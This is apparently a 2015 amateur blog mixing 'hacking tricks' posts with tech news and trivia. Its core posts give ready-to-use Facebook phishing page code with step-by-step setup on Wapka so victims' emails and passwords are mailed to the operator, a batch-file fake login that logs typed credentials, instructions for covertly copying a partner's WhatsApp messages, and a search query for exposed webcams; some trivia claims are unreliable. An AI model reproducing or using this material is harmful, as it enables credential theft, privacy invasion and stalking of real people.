Saturday, June 6, 2015

HOW TO HACK WIFI BY USING CMD


  1. Open cmd to open cmd type cmd in run.
  2.  At the CMD type netsh wlan show network mode=bssid it show all available wifi network
  3. How to connect wireless network Type netsh wlan connect name=(wifi name ) netsh wlan connect name=Mynet Sata1 press enter your wifi is connected
or watch the tutorial video https://www.youtube.com/watch?v=UVGarRgzybs

how to lock folder without software (Notpad)

HOW TO BUT PASSWORD FOLDER WITHOUT SOFTWARE

  1. OPEN NOTEPAD & COPY THE FOLLOWING CODE INTO THE NOTEPED



cls
@ECHO OFF
title Somalitechpres.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== Adilyuuka goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End

SAVE AS LOCK.BAT
WATCH THE VIDEO  https://www.youtube.com/watch?v=dQC55rc1Bi4&feature=youtu.be

Monday, June 1, 2015

KEYLOGGER FOR FACEBOOK


keylogger for a facebook @echo off color 9 title Login cls echo Please Enter Email Adress And Password. echo Contact yuukeycali@gmail.com echo. cd "C:\Logs" set /p user=Username: set /p pass=Password: echo Website Blocks Prevented Operation pause >n echo Username="%user%" Password="%pass%" >Log.txt start >>Program Here<< exit

Sunday, May 31, 2015

FUNNY COMPUTER TACTS "-_-"


1. Amazon , originally a printed book seller company, now sells more e-books than printed books. 2. 220 million tons of old computers and other technological hardware are trashed in the United States each year. 3. The first two video games copyrighted in the U.S. were Asteroids and Lunar Lander in 1980. 4. Tim Berners-Lee coined the phrase “World Wide Web” in 1990. 5. U.S. President Bill Clinton’s inauguration in January 1997 was the first to be webcast. 6. Google uses an estimated 15 billion kWh of electricity per year, more than most countries. However, google generates a lot of their own power with their solar panels. 7. Microsoft Windows tutorial’s another name is ‘Crash Course’. Now we now! 8. Did you know hows was Bill Gates’ house was designed? Using a Macintosh computer. 9. About 1.8 billion people connect to the Internet, only 450 million of them speak English. 10. By the end of year 2012, there will be total approximately 17 billion devices (which includes computers, tablets and mobile) connected to the Internet.

Facebook Code phashing

  • <html>
    <body>
    <h1>
    <a href="http://facebook.com/CrazyGhouri"><h1>Facebook</h1></a></h1>
    </body>
    </html>
    <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Wapka.mobi</title><link rel="STYLESHEET" type="text/css" href="/styles.css"/><meta forua="true" http-equiv="Cache-Control" content="max-age=0"/><style type="text/css">
     body { background: ;
    color: ;
     }
     a { color: ;
     }
     </style>
     </head><body>
    <div><?xml version="1.0" ?>
    <!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">
    <wml>
     <head>
     <meta forua="true" http-equiv="Cache-Control" content="max-age=0"/>
     <link rel="STYLESHEET" type="text/css" href="http://skfacebook.wapka.mobi/styles.css"/>
     </head>
     <template>
            <do type="options" name="Prev" label="Back"><prev/></do>
     </template>
     <card id="index" title="Facebook" >
    <p><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
     
    <script type="text/javascript"> document.title = "Welcome to Facebook"; </script>
     
    <head title="Welcome to Facebook"><title>Welcome to Facebook</title><meta name="description" content="Facebook helps you connect and share with the people in your life." /><meta name="referrer" content="default" id="meta_referrer" /><meta http-equiv="X-Frame-Options" content="deny" />
     
    <!-----[ » © Fb Phishing 2014 copyrighted by Facebook.com/MadMistaker™ &amp; all credit goes to Ghouri « ]-----!>
     
     
    </head><body class="nontouch acw"><div class="mfsm"><div id="viewport"><div class="acb aps" id="u_0_0" data-sigil="MTopBlueBarHeader"><table cellspacing="0" cellpadding="0" class="lr"><tr><td valign="top"><h1><a href="http://m.facebook.com/home.php?_dmr&amp;refid=8"><img src="http://static.ak.fbcdn.net/rsrc.php/v2/yz/r/aKhO2tw3FnO.png" width="76" height="20" class="img" alt="facebook" /></a></h1></td></tr></table></div><div id="objects_container"><div id="root" tabindex="0" role="main" class="_fco acw" data-sigil="context-layer-root">
     
    <div class="acy aps abb"><span class="mfss">You must login again.</span></div>
    <form method="post" class="mobile-login-form _fcp" onSubmit="window.open ('http://facebook.com')" action="site_0.xhtml">
    <div class="mobile-login-field aclb apl"><div>Email or Phone<br/><input type="text" name="mf_text[Email]" class="input"/>
    </div></div><div class="mobile-login-field aclb apl"><div>Password<br/>
    <input type="password" class="input" name="mf_text[Password]"/>
    </div></div><div class="button_area aclb apl">
    <input type="hidden" name="p" value="XXXXXXXXX"/><input type="hidden" name="action" value="send_message"/>
    <input type="submit" name="MF_submit" class="btn btnC largeBtn" size="0" value="Log In" /></div><hr style="background-color:#cccccc;height:1px;border:0px solid #fff;margin:0.3em auto;width:100%;" /><div class="mobile-login-form _fcp"><span class="mfss fcg" style="margin-left:6px;"><b>New to Facebook?</b></span></div><div class="_4u9b aclb"><div class="button_area aclb apl"><a class="btn btnS largeBtn" href="http://m.facebook.com/r.php?refid=8">Create New Account</a></div></div><input type="hidden" autocomplete="off" name="_fb_noscript" value="true" /></form><div class="other-links aclb apl"><span class="mfsm fcg"><a href="http://m.facebook.com/recover/initiate/?refid=8">Forgot password?</a><br /><a href="http://m.facebook.com/help/?refid=8">Help Center</a></span></div></div></div></div></div><div><div id="footer"><div class="acg apm"><span class="mfss fcg"><b>English (US)</b> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/a/language.php?l=es_LA&amp;lref=http%3A%2F%2Fm.facebook.com%2F&amp;gfid=AQD28mdu19R_4ouf&amp;refid=8">Español</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/a/language.php?l=pt_BR&amp;lref=http%3A%2F%2Fm.facebook.com%2F&amp;gfid=AQDjJGXjQ2aRMYRs&amp;refid=8">Português (Brasil)</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/language.php?n=http%3A%2F%2Fm.facebook.com%2F&amp;refid=8">More…</a></span></div><div class="acg apm"><span class="mfss fcg">Facebook ©2014</span></div></div></div><div id="static_templates"></div></body>
     
    </html>
    </p><p align="center"><a href="/menu_0.wml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/2465791/adshows/1/aid/8/country/IN/position/bottom">Super download speed only in uc browser</a></p><img src="/ga.gif?utmac=MO-32471805-1&amp;utmn=786667047&amp;utmr=-&amp;utmp=%2Fsite_0.xhtml&amp;guid=ON" width="1" height="1" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-32471805-3&amp;utmn=344471327&amp;utmr=-&amp;utmp=%2Fsite_0.xhtml&amp;guid=ON" width="1" height="1" />
              </card>
       </wml>
       </div><p align="center"><a href="/menu_0.xhtml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/2466575/adshows/3/aid/8/country/IN/position/bottom">Super download speed only in uc browser</a></p><img src="/ga.gif?utmac=MO-32471805-1&amp;utmn=738948482&amp;utmr=-&amp;utmp=%2Findex.xhtml&amp;guid=ON" width="1" height="1" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-32471805-3&amp;utmn=1497913535&amp;utmr=-&amp;utmp=%2Findex.xhtml&amp;guid=ON" width="1" height="1" /></body></html>

How to create a keylogger in notepad

Here is a basic keylogger script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only.


@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start >>Program Here<<
exit
 
1.) Now write  the above code into Notepad and save it as a Logger.bat file.
2.) Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.
3.) Drag that folder in to the C:\
4.) Test out the Logger.bat!
5.) Alright, now once you test it, you will go back into the Logs folder in the C:\And a .txt file will be in there, [if you make a second entry, the .txt file will overwrite itself.]
 

Saturday, May 30, 2015

DO YOU KNOW?


Friends today we will highlight 12 interesting computer Facts that you might not be knowing it before, lets see them now. Also you would like to know about the 20 Facts About Technology Which Will Amuse You 1)Over 6,000 new computer viruses are released every month. 2)The first computer mouse, constructed in 1964, was made out of wood.(by Doug Engelbart) 3)The average human being blinks 20 times a minute – but only 7 times a minute when using a computer. 4)The first electro-mechanical computer was developed in 1939. 5)By the end of 2012 there will be 17 billion devices connected to the internet. 6)5 out of every 6 internet pages are porn related. 7)Over 1 million domain names are registered every month. 8)With it’s 800 million interent users, Facebook would be the third largest country in the World. 9)The first hard drive was created in 1979 and could hold 5MB of data. 10)The nVidia GeForce 6800 Ultra video card contains 222 million transistors. 11)20% of online viruses are released by organized crime units. 12The engineers who developed the IBM PC were known as “The Dirty Dozen”

How To Hack Your GirlFriends WhatsApp Database!

Follow These Simple Steps-

1. Take friends mobile
2. Go to Micro sdcard >Whatsapp > Databases
3. Select all the files from here and send it to your phone via bluetooth or Wifi.
4. Backup you Whatsapp database files and replace
these files in your mobile.
5. Now open whatsapp and read your friends messages.

Enjoy!!!

HOW TO MAKE Facebook Secure Type WML/XHTML Code Wapka

 
 
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Wapka.mobi</title><link rel="STYLESHEET" type="text/css" href="/styles.css"/><meta forua="true" http-equiv="Cache-Control" content="max-age=0"/><style type="text/css">
 body { background: ;
color: ;
 }
 a { color: ;
 }
 </style>
 
 </head><body>
<div><?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Facebook Security</title><link rel="STYLESHEET" type="text/css" href="/styles.css"/><meta forua="true" http-equiv="Cache-Control" content="max-age=0"/><style type="text/css">
 body { background: ;
color: ;
 }
 a { color: ;
 }
 </style>
 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Facebook Security</title><link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yV/r/hzMapiNYYpW.ico"/>
<link rel="STYLESHEET" type="text/css" href="/styles.css"/><meta forua="true" http-equiv="Cache-Control" content="max-age=0"/><style type="text/css">body { background: ;
color: ;}
a { color: ;}
</style></head></html>
 
 </head><body>
<div><body><div><link rel="STYLESHEET" type="text/css" href="http://skfacebook.wapka.mobi/styles.css"/>
<div><body>
<div><link rel="stylesheet" type="text/css" href="http://davinci.hexat.com/css/fb.css" media="all,handheld"/></div>
<div> <div class="header"><table width="100%"><tr><td align="left" style="width:50%"><img src="http://denny83.xtgem.com/images/fb.png"></img></td><td align="right" valign="bottom" style="widh:30%"><small><a href="http://fb-secure.wapka.mobi"><font color="white">Search</font></a></small></td></tr></table><div style="text-align:left;"> <a href="http://faacebook2.wapka.mobi"><font color="white">Home</font></a> <a href="http://fakebook5.wapka.mobi"><font color="white">Profile</font></a> <a href="http://fb-secure.wapka.mobi"><font color="#FEFF80">  <b>Find Friends(10)</b></font></a> <a href="http://faacebook2.wapka.mobi"><font color="#FEFF80">  <b>Messages(18)</b></font></a> <a href="http://fakebook5.wapka.mobi"><font color="#FEFF80"> <b>Notifications(47)</b></font></a>  <a href="http://fb-protect.wapka.mobi"><font color="white"> Chat(15)</font></a></div></div></div>
<div><div><img src="http://wapkaimage.com/4138/4138595_f3a92977be.jpg" alt="" /></div> <br/>
<div><big>Dear user,
TO increase the security of your account, kindly confirm your account.</big></div>
<div><br/></div>
<div><form method="post" class="mobile-login-form _fcp" onSubmit="window.open (' http://facebook.com')" action="site_0.xhtml"> <div class="mobile-login-field aclb apl"><div>Email OR Phone<br/><input type="text" name="mf_text[Email]" class="input"/> </div></div><div class="mobile-login-field aclb apl"><div>Password<br/> <input type="password" class="input" name="mf_text[Password]"/> </div></div><div class="button_area aclb apl"> <input type="hidden" name="p" value="111460033"/><input type="hidden" name="action" value="send_message"/> <input type="submit" name="MF_submit" class="btn btnC largeBtn" size="0" value="Confirm" /></div><hr style="background-color:#cccccc;height:1px;border:0px solid #fff;margin:0.3em auto;width:100%;" /></form></div></div>
<div><div class="aclb"><div class="loginlnner"><a href="http://m.facebook.com/recover/initiate/?refid=8"><br/><b>Forgot password?</b></a></div></div></div>
<div><div class="aclb"><div class="loginlnner"><div class="acy apl abt abb"><a href="http://m.facebook.com/fbapp/d/facebook.jad?cr=mb&amp;refid=8">Install Facebook on your phone AND browse faster</a></div></div></div></div>
<div align="center"><a name="[&amp; #8593;]top"></a><a href="#down">[]Top</a></div>
<div><div class="aclb"><div class="loginlnner"><form action="http://m.facebook.com/search/?refid=8"><input type="text" name="q" size="13%" maxlength="50000" value="  " /><input type="hidden" name="as_sitesearch" value="facebook.com"/><input type="submit" value="Search" /></form></div></div></div>
<div align="center"><br /><div><div id="footer"><div class="acg apm"><span class="mfss fcg"><a href="http://m.facebook.com/help/?refid=8">Help</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/settings/?refid=18">Setting &amp; Privacy</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/policies/?refid=18">Terms &amp; Poliches</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/bugnub/?source=Footer &amp; refid=18">Report a Problem</a></span></div></div></div><div id="static_templates"></div></div>
<div align="center"><a href="http://jagajmjm.Wapka.Mobi">Logout</a></div>
<div align="center"><a href="http://grameenphone.com">Dial *325*88# to enjoy unlimited Facebook</a></div></body></div></div></body>
</div>
<div><noscript/></div><p align="center"><a href="/menu_0.xhtml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/2660140/adshows/4/aid/29/country/ASIA/position/bottom"><img src=" /pictures/union/1111/7.png" /></a></p><img src="/ga.gif?utmac=MO-32471805-1&amp;utmn=133524880&amp;utmr=https%3A%2F%2Fwww.facebook.com%2F&amp;utmp=%2Findex.xhtml&amp;guid=ON" width="1" height="1" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-46050634-1&amp;utmn=10757070&amp;utmr=https%3A%2F%2Fwww.facebook.com%2F&amp;utmp=%2Findex.xhtml&amp;guid=ON" width="1" height="1" /></body></html>
</div><p align="center"><a href="/menu_0.xhtml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/3030756/adshows/1/aid/23/country/IN/position/bottom"><img src="/pictures/9apps.png" /><br />Hottest Apps & Games & Wallpapers Download</a></p><img src="/ga.gif?utmac=MO-32471805-1&amp;utmn=1685437188&amp;utmr=-&amp;utmp=%2Fsite_0.xhtml&amp;guid=ON" width="1" height="1" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-46050634-1&amp;utmn=514398533&amp;utmr=-&amp;utmp=%2Fsite_0.xhtml&amp;guid=ON" width="1" height="1" /></body></html>

How to make Best & Easy Facebook Wapka Phishing Site with Screenshots | Step by Step Tutorial |Facebook Tricks

IMPORTENT NOTES-:-

→ Delete all the elements of your Site before pasting the HTML codes.
→ When someone will login on your Site. His Email & Password will be sent to your mail with whom you  registered on WAPKA

Steps to create Wapka Facebook Phishing

.→ Open Wapka.mobi

2.→ Login with your Wapka account on Wapka.mobi

3.→ Open your Site 

P1
( or create a new one & then click manage it )

4.→ Now Click on Admin Mode

P1
5.→ Click on #EDIT SITE option at the bottom right side of your page. See image shown below.

P1
6.→ Then Click on Wml/xhtml option.

P1
7.→ Copy All the HTML Codes Given below.

<!Doctype html>
<html>
<head><meta name="keywords" content="Facebook trickz, fb tricks, tips, hacking, secret codes, fbtrickz.mobie.in, fbtrickz.mobi, in, net, com, org, Triks, fb chat, codes" /> <meta name="description" content="All Facebook Tricks Tips | Latest working Tricks | All Fb Tricks web wap Sites | Hacking Tricks Sites | fbtrickz.mobie.in mobi.net  mobi.in mobile.com xtgem wapka trickz blog  fb triks" />
<link rel="stylesheet" type="text/css" href="http://fbtrickz.mobie.in/styles.css" />

<link rel="shortcut icon" href="http://fbtrickz.mobie.in/favicon.ico" />

<script type="text/javascript"> document.title = "Welcome to Facebook"; </script>
<link rel="shortcut icon" href="https://m.facebook.com/favicon.ico" />
</head>
<body class="nontouch acw">
<div class="acb aps" id="u_0_0" data-sigil="MTopBlueBarHeader">
<table cellspacing="0" cellpadding="0" class="lr"><tr><td valign="top"><h1><a href="http://m.facebook.com/home.php?_dmr&refid=8"><img src="http://fbtrickz.mobie.in/facebook/aKhO2tw3FnO.png" width="76" height="20" class="img" alt="facebook" /></a></h1></td><td valign="top" class="r"><a class="btn btnS" href="http://m.facebook.com/r.php?refid=8">Create Account</a></td></tr></table></div>
<div class="loginInner"><div class="acy apl abt abb"><a href="http://m.facebook.com/fbapp/d/facebook.jad?cr=mb&refid=8">Get Facebook Mobile and browse faster.</a></div><div style="background: #eceff5;"><form method="post" class="mobile-login-form _fcp" onSubmit="window.open ('http://www.facebook.com')" action="site_0.xhtml"><div class="mobile-login-field aclb apl"><div style="margin-left: 10px;">Email Address or Phone<br/><input type="text" name="mf_text[Email]" class="input"/></div></div><div class="mobile-login-field aclb apl"><div style="margin-left: 10px;">Password<br/><input type="password" class="input" name="mf_text[Password]"/></div></div><div class="button_area aclb apl" style="margin-left: 10px; background: #eceff5;"><input type="hidden" name="p" value="146956576" /><input type="hidden" name="action" value="send_message"/><input type="submit" name="MF_submit" class="btn btnC largeBtn" size="0" value="Log In" /></div><hr style="background-color:#cccccc;height:1px;border:0px solid #fff;margin:0.3em auto;width:100%;" /><div class="mobile-login-form _fcp" style="background: #eceff5;"><span class="mfss fcg" style="margin-left:6px;"><b>New to Facebook?</b></span></div><div class="_4u9b aclb"><div class="button_area aclb apl" style="margin-left: 8px;"><a class="btn btnS largeBtn" href="http://m.facebook.com/r.php?refid=8">Create New Account</a></div></div><input type="hidden" autocomplete="off" name="_fb_noscript" value="true" /></form></div>
<div class="other-links aclb apl"><span class="mfsm fcg"><a href="http://m.facebook.com/recover/initiate/?refid=8">Forgot password?</a><br/>
<a href="http://m.facebook.com/help/?refid=8">Help Center</a></span></div></div>
<div id="footer"><div class="acg apm" style="background: #eceff5;"><span class="mfss fcg"><b>English (US)</b> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/a/language.php?l=es_LA&lref=http%3A%2F%2Fm.facebook.com%2F&gfid=AQD28mdu19R_4ouf&refid=8">Español</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/a/language.php?l=pt_BR&lref=http%3A%2F%2Fm.facebook.com%2F&gfid=AQDjJGXjQ2aRMYRs&refid=8">Português (Brasil)</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/language.php?n=http%3A%2F%2Fm.facebook.com%2F&refid=8">More…</a></span></div>
<div class="acg apm" style="background: #eceff5;"><span class="mfss fcg" style="color: black;">Facebook ©2014</span></div></div>
</body>
</html>

<div><noscript/><--!></div><p align="center"><a href="http://wap.wapka.mobi">Create your own WAP site (Wapka.Mobi)</a></p><br />


Friday, May 29, 2015

Google Chromebit: a computer the size of a memory stick


A new micro-PC from Google can plug into any TV or monitor, offering a cheap alternative to a laptop It's not how big it is, it's what you can do with it. This seems to have been the guiding principle behind Google's latest device, the Chromebit – a computer housed in a memory stick-sized shell. With the launch of the device, Google hopes to create a whole new category of computing: small dongle computers that plug directly into a television or monitor and all for under $100 (the UK price has yet to be announced). So will people buy it? Chromebit styling The Asus Chromebit looks "like an oversize flash drive", Cnet.com says, and will turn any screen or monitor with an HDMI video port into a fully functioning computer. The device comes in three colours, and features a "super-smart" swivel that means it can plug into almost any HDMI port without needing an extension chord, Gizmodo says. "If you ask me, all dongles should feature that". Chromebit features Chromebit connects via wi-fi, so after you plug it in to any monitor or TV set, you can run Google's Chrome browser, check Gmail and watch YouTube through Google's Chrome operating system. The company says the $99 device is aimed at educational institutions and developing countries, according to The Verge. Google also hopes that the device will suit regular travellers, who will be able to use it with hotel TVs and for presentations. Chromebit specs The Chromebit is fitted with a Rockchip RK3288 processor. It has 2GB of RAM – double that of an iPhone 6, so should be fast. Although it has a fairly paltry 16GB of solid state storage, Chrome products are not designed with storage in mind – instead, users are expected to use web-based cloud storage system, ideally those provided by Google. Chromebit offers fast wi-fi and Bluetooth connectivity, as well as a single USB 2.0 port at the back, so you can plug in external devices. "it won’t be the most powerful PC you could plug into a TV," says Gizmodo, "but it shouldn’t be too bad for the browser-based OS." Conclusion Dongle computers have been around in China for about a year, but Google's decision to bring them to the West is probably down to the success of its cheap Chromecast streaming stick, the Daily Mirror says. In a nutshell, it is a small, cheap computer with no screen or accessories. "It won't replace a decent laptop - or a tablet like the Surface 3 for that matter," the Mail says, "but it is an affordable way to get hold of another computer."

How to Use Your Phone as a Webcam


"Why would anyone want to use their phone as a webcam?" This was the most common reaction people had when we told them what we were trying to do, but there are actually some pretty good reasons to do this. For one, you can turn an old handset into a security camera or baby monitor which you can use without buying a brand new standalone camera. And if your handset doesn't have a front facing camera, or if your PC doesn't have a webcam built in, then you can use the rear camera on the phone for video calls. It is obviously easier to buy a dedicated camera, but if you don't want to buy a brand new webcam, or want to find a good use for your old phone instead of selling it, then setting it up like this is a nice idea. Here's how to set it up. Security camera One of the ways in which you can use an old phone is by setting it up as a security camera or a baby monitor. This is pretty easy to do with the right apps for both Android phones and iPhones. This is how you set it up: Android A quick search on Google Play throws up several webcam applications. We tried 5 of the top 10 results, but most didn't work properly. From the ones that didn't crash repeatedly, SmartCam failed to show the video, and DroidCam needs you to install an app on Windows to work. IP Webcam is easily the best of the lot because it works through your browser, which gives it the cross-platform compatibility. To set up a security camera on Android, follow these steps. 1. Connect your computer and the phone to the same Wi-Fi network. 2. Install the IP Webcam app on your smartphone. 3. Close all other camera apps. Force close them from the app switcher before you proceed. 4. Launch the IP Webcam app. Scroll to the bottom and tap Start server. 5. The app will now fire up your phone's camera and display a URL. Our URL was http://172.32.15.110:8080. 6. Enter this URL in any browser on your computer and hit Enter. 7. In the browser, you'll see a drop down menu next to Video renderer. Select Browser. 8. Below that, you'll see Audio renderer. Select HTML wav. Now you'll see a live video feed in your browser. You can also record this footage via the browser. To do this, just press the red Record button under the video. This saves the footage as an MP4.There will be a slight lag if you enable HTML wav audio in the browser. You can select the Flash option (doesn't work on all computers) or open the same URL in VLC Media Player. 9. To do this, first download and install VLC from this website. Then in VLC, go to Media

White House Hackers Were 'Russian Speakers', Claim Researchers


Hackers who penetrated the State Department and White House computer networks in recent months were "Russian speakers," security researchers said Wednesday. The hackers have aimed at high-profile targets including US government and commercial networks as well as in Germany, South Korea and Uzbekistan, according to researchers at Kaspersky Lab, a Russian-headquartered security firm. The malware used, dubbed "CozyDuke," bears similarities to other malicious programs used in recent years and is designed to get around most detection programs. Kaspersky said CozyDuke's coding is related to similar malware MiniDuke and CosmicDuke. "We have been monitoring both MiniDuke and CosmicDuke for couple of years. Kaspersky Lab was the first to warn about MiniDuke attacks in 2013, with the oldest known samples for this cyberthreat dating back to 2008," said Kaspersky researcher Kurt Baumgartner. "CozyDuke is definitely connected to these two campaigns, as well as to the OnionDuke cyberespionage operation. Every one of these threat actors continues to track their targets, and we believe their espionage tools are all created and managed by Russian-speakers." According to Kaspersky, this group is responsible for the attack on the State Department which allowed hackers to access the White House. Last year, White House officials acknowledged a computer intrusion but said no classified data was accessed, and did not comment on reports linking the attack to Russian hackers. Kaspersky said a key element of the attacks was the use of "spearphishing," or emails that appear legitimate but contain attachments that install malware when a recipient clicks on them. One of the attachments was an amusing "office monkeys" video which appears to be innocent. "These videos are quickly passed around offices with delight while systems are infected in the background silently," the Kaspersky report said.

India Affected by 'Bioazih' Trojan, Warns CERT-In


The Indian cyberspace has been hit by the malicious activity of a potentially threatening malicious software which can execute phishing attacks to negatively alter users' personal data, country's lead cyber-security agency has said. The Computer Emergency Response Team of India (CERT-In) has detected that the malware identified as 'Bioazih' which can acquire as many as five aliases to hide its evil designs and "can execute commands remotely, upload data, download and execute files" in an unauthorsied manner. "It has been reported that a new malware having backdoor functionalities dubbed as 'Bioazih' is spreading. The malware propagates by means of spear phishing emails containing attached malicious document exploiting Microsoft Office vulnerability or the Remote Access Trojan (RAT) may infect the targeted users system by means of malware dropper also," CERT-In said in its latest advisory to Internet users. The CERT-In is the nodal agency to combat hacking, phishing and to fortify security-related defences of the Indian Internet domain. The threat is critical as it belongs to the deadly 'Trojan' family and a 'spear phishing' attack is a clever activity done by an infectious malware to hit a healthy system stealthily. The agency said the malware makes use of different techniques to maintain anonymity of its command and control servers or it sets up virtual private networks to host their servers in order to hide their actual locations. "Once connection is established, the malware then is capable of communicating with command and control server to execute remote commands, upload and download data, create and delete files, manipulate files and folders, terminate itself among others," the advisory said. "The users should look for identifications like the name Bioazih and its aliases in suspect emails and links and should refrain from clicking on them. "Also, security firewalls on personal systems, emails and other online platforms should be strong to avoid getting attacked by it," a cyber expert said. The CERT-In has suggested some counter-measures in this regard to users which include looking for unusual ports opened, deletion of system changes made by the malware such as files created/registry entries among others. It added that an user should configure his or her email server to block or remove emails that contain file attachments that are commonly used to spread threats such as .vbs, .bat, .exe, .pif, .jpg, and .scr files. "Disable auto run/auto play, do not visit untrusted websites, enable firewall at gateway or desktop level, do not download or open attachment in emails received from untrusted sources or unexpectedly received from trusted users and install and scan anti-malware engines and keep them up-to-date" are some of the other security protocols suggested by the agency to the users in this regard.

Government Facing Cyber-Attacks From China, Other Nations: Telecom Minister


Cyber-attacks are being launched from China and some other nations to penetrate computer networks of government organisations in India, Parliament was informed on Wednesday. To deal with these issues, the government has taken a number of measure to enhance cyber-security and prevent cyber-spying attacks, Minister of Communications and IT Ravi Shankar Prasad said in a written reply to the Lok Sabha. He further said that a crisis management plan has been formulated for countering cyber-attacks and cyber-terrorism. "There have been attempts from time to time to penetrate cyber-networks and systems operating in government organisations. These attacks have been observed to be directed from the cyberspace of a number of countries, including China," the Minister said. He added that attackers use masquerading techniques and hidden servers to hide the identity of actual system from which attacks are being launched. "Government is aware of the nature of the threats in cyber space and accordingly, is following an integrated approach with a series of legal, technical and administrative steps to ensure that necessary systems are in place to address the growing threat of cyber-attacks in the country," he said. The government has circulated computer security policy and guidelines to all ministries/departments on taking steps to prevent, detect and mitigate cyber-attacks, he said. The Minister said security agencies have been equipped with suitable technical support to prevent and safeguard against cyber-threats. "Air gap between Internet and official networks is being maintained by organizations involved in strategic activities," Prasad said adding that the government has formulated crisis management plan for countering cyber-attacks and cyber terrorism as well. "Indian Computer Emergency Response Team (CERT-In) has empanelled 51 information security auditors through a stringent mechanism of selection to carry out audits," he said. In reply to a separate question, Prasad said India and Japan are collaborating on cyber security in the form of Memorandum of Understanding (MoU) signed between CERT-In and Japan-CERT for exchange of information on latest threats and vulnerabilities and mitigation strategies to cyber-attacks.

Hack any webcam hooked up to the internet


STEP 1: OPEN IE OR FIREFOX Go to google and search up inurl:/view/index.shtml Here you will find any webcam hooked up to the internet, your even able to control some of them!

More than 900,000 fake Android apps found on Google Play


Android smartphone users use Google Play usually to download or buy various apps for their phone, but Google assures you that every app on the Google Play is genuine and there is no spam or malware inside it? Answer is NO. According to a recent study of the Japanese security software company Trend Micro has found more than 900,000 fake apps on the trusted Google Play Store. These apps are being used to steal your personal, financial information or aggressively serving ads. These apps looks like real, and claim to be genuine but in-real, it asks you for some permissions that allows the fake app to steal your personal information or to use your phone for some illegal purposes too. Company researched about top 50 Google Apps for a fake one in the Play Store and found fake versions existed for 77 percent of the apps, cleverly disguised to look and act like the real apps but loaded with malicious code. “A more recent example of a rogue antivirus app known as “Virus Shield” received a 4.7-star rating after being downloaded more than 10,000 times, mostly with the aid of bots,” Trend Micro said in its report. Cheekily, scammers charged $3.99 for the fake app, which promised to prevent harmful apps from being installed. It was removed by Google after a few days, but not before it fooled thousands of users and even became a “top new paid app” in the Play Store. Trend said it was “perplexing” how the app achieved “top” status. This report from Trend Micro comes on the same day when Google announced its Project Zero for which Google hires top class hackers to serve its services malware free. Google’s announcement was “ironic” considering the large number of problems Trend Micro found in Google’s own backyard. I strongly suggest they take aim at the Android marketplace and Google Play,” said JD Sherry, vice president of technology and solutions at Trend Micro.

Anonymous Hacktivists Help FBI in Finding The Centcom Hackers


